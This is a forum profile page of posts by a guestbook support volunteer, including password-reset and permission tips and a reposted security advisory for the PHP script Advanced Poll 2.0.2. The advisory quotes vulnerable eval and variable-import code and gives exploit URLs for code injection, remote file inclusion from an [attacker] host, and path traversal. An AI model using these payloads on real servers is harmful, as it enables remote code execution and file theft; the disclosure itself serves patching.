If you are not registered or logged in, you may still use these forums but with limited features. Show recent topics
  [Search] Search   [Hottest Topics] Hottest Topics   [Members]  Member Listing   [FAQ]  FAQ 
[Register] Register / 
[Login] Login 
Messages posted by: Jam'n
Forum Index » Profile for Jam'n » Messages posted by Jam'n
Author Message
Hi Trevor,

Take a look here
Seems the Exploit was posible thru a bug in the php version you use.
So if your hosting company has the latest version than the bug doesn't work.
You will need PHPadmin for this.

To reset you password:

Select the Guestbook database
Now choose on the right side of screen select SQL
Now insert in the Data Entry Field the following lines:



And click "GO"

This will reset your account to:

User name: test
Password: 123

Also read this topic: http://proxy2.de/forum/viewtopic.php?t=3037
www.starelement.com works for me.

And yes both the guestbook tutorials are made by me
If it's correct they should be the same.

Yep they are both version 1.4 and that's the latest version.
Login as an admin and use:

To check your environmental variables, click here.

and then look if "file_uploads" is on

This means you can upload files if its off you can't.
Auron , JTD and Brianr

Thanks guy's and good luck with rest.

@ Auron: I love the new design you made
Thanks Yumiko.
But I’m stopping my support and development for the guestbook, because I have some other obligations and priorities.
So you will not find any help anymore at Procaz.
I’m stopping my support and development for the guestbook, because I have some other obligations and priorities.
So you will not find any help anymore at Procaz.
Use the search button:

http://proxy2.de/forum/viewtopic.php?t=2934&highlight=reset+password
The link doesn't work and when I go too the root (http://www.z-gal.com/)
I get this error:

Warning: main(./conf_global.php): failed to open stream: No such file or directory in /home/z-gal/public_html/index.php on line 93
Frontpage doesn't support php
It seems there is also a bug Advanced Poll 2.0.2


°°°°°°°°°°°°°
Language : PHP
Product : Advanced Poll
Version : 2.0.2 Textfile
Website : http://www.proxy2.de
Problems :
- PHP Code Injection
- File Include
- Phpinfo



PHP Code/Location :
°°°°°°°°°°°°°°°°°°°


comments.php :


------------------------------------------------------------------------------------------------------
[...]
$register_poll_vars = array("id","template_set","action");


for ($i=0;$i<sizeof($register_poll_vars);$i++) {
if (isset($HTTP_POST_VARS[$register_poll_vars[$i]])) {
eval("\$$register_poll_vars[$i] =
\"".trim($HTTP_POST_VARS[$register_poll_vars[$i]])."\";");
} elseif (isset($HTTP_GET_VARS[$register_poll_vars[$i]])) {
eval("\$$register_poll_vars[$i] =
\"".trim($HTTP_GET_VARS[$register_poll_vars[$i]])."\";");
} else {
eval("\$$register_poll_vars[$i] = '';");
}
}
[...]
------------------------------------------------------------------------------------------------------




booth.php, png.php :


---------------------------------------------------------------
<?php


$include_path = dirname(__FILE__);
if ($include_path == "/") {
$include_path = ".";
}


if (!isset($PHP_SELF)) {
global $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_SERVER_VARS;
$PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"];
if (isset($HTTP_GET_VARS)) {
while (list($name, $value)=each($HTTP_GET_VARS)) {
$$name=$value;
}
}
if (isset($HTTP_POST_VARS)) {
while (list($name, $value)=each($HTTP_POST_VARS)) {
$$name=$value;
}
}
if(isset($HTTP_COOKIE_VARS)){
while (list($name, $value)=each($HTTP_COOKIE_VARS)){
$$name=$value;
}
}
}


require $include_path."/include/config.inc.php";
require $include_path."/include/class_poll.php";
[...]
---------------------------------------------------------------



poll_ssi.php, popup.php :


----------------------
include "./booth.php";
----------------------





admin/common.inc.php :


---------------------------------------------------------------
[...]
if (!isset($PHP_SELF)) {
$PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"];
if (isset($HTTP_GET_VARS)) {
while (list($name, $value)=each($HTTP_GET_VARS)) {
$$name=$value;
}
}
if (isset($HTTP_POST_VARS)) {
while (list($name, $value)=each($HTTP_POST_VARS)) {
$$name=$value;
}
}
if(isset($HTTP_COOKIE_VARS)){
while (list($name, $value)=each($HTTP_COOKIE_VARS)){
$$name=$value;
}
}
}


$pollvars['SELF'] = basename($PHP_SELF);
unset($lang);
if (file_exists("$base_path/lang/$pollvars[lang]")) {
include ("$base_path/lang/$pollvars[lang]");
} else {
include ("$base_path/lang/english.php");
}
[...]
---------------------------------------------------------------



In the /admin/ directory, in the files :


- index.php
- admin_tpl_new.php
- admin_tpl_misc_new.php
- admin_templates_misc.php
- admin_templates.php
- admin_stats.php
- admin_settings.php
- admin_preview.php
- admin_password.php
- admin_logout.php
- admin_license.php
- admin_help.php
- admin_embed.php
- admin_edit.php
- admin_comment.php


:


------------------------------------
[...]
$include_path = dirname(__FILE__);
$base_path = dirname($include_path);


require "./common.inc.php";
[...]
------------------------------------



misc/info.php :


-------------------------
<html>
<head>
<title>PHP Info</title>
</head>
<body bgcolor="#3A6EA5">
<?php
phpinfo();
?>
-------------------------



Exploits :
°°°°°°°°


- if magic_quotes_gpc=OFF :


http://[target]/comments.php?id=";[PHPCODE]//&template_set=";[PHPCODE]//&action=";[PHPCODE]//


or with a POST form or cookies.


- This will only work if register_globals=OFF (this is not an error...) :


http://[target]/booth.php?include_path=http://[attacker] (or with png.php,
poll_ssi.php, popup.php) will include the files :
http://[attacker]/include/config.inc.php
and
http://[attacker]/include/class_poll.php


- This will work if register_globals=OFF OR ON :


http://[target]/admin/common.inc.php?basepath=http://[attacker] will include
the file http://[attacker]/lang/english.php.


The same hole can be found, in the /admin/ directory, in the files :


- index.php
- admin_tpl_new.php
- admin_tpl_misc_new.php
- admin_templates_misc.php
- admin_templates.php
- admin_stats.php
- admin_settings.php
- admin_preview.php
- admin_password.php
- admin_logout.php
- admin_license.php
- admin_help.php
- admin_embed.php
- admin_edit.php
- admin_comment.php


but only with register_globals=OFF.
And, with register_globals=OFF and with all the files above again, the url
http://[target]/admin/common.inc.php?base_path=..&pollvars[lang]=../../../file/to/view
will include the file http://[target]/admin/../../../file/to/view



- http://[target]/misc/info.php will show the phpinfo().



Solution/More details :
°°°°°°°°°°°°°°°°°°°°
Both patch and details can be found on http://www.phpsecure.info .



Credits :
°°°°°°°°
frog-mn
http://www.phpsecure.info
Hi,

Amber222 is right, most of the time ths is a chmod question.
You shouldn't set Memorial to 777, because you give everybody write permission to your root directory.

Here is how I have the chmod setup:

admin 755
doc 755
img 755
lang 755
lib 755
public 777
templates 777
tmp 777
Messages such as 'Thankyou for stopping by my site...' are contained in the file english.php in the lang sub-directory.
No kown exploits yet (as far as I know).
 
Forum Index » Profile for Jam'n » Messages posted by Jam'n
Go to:   
Based on the open source JForum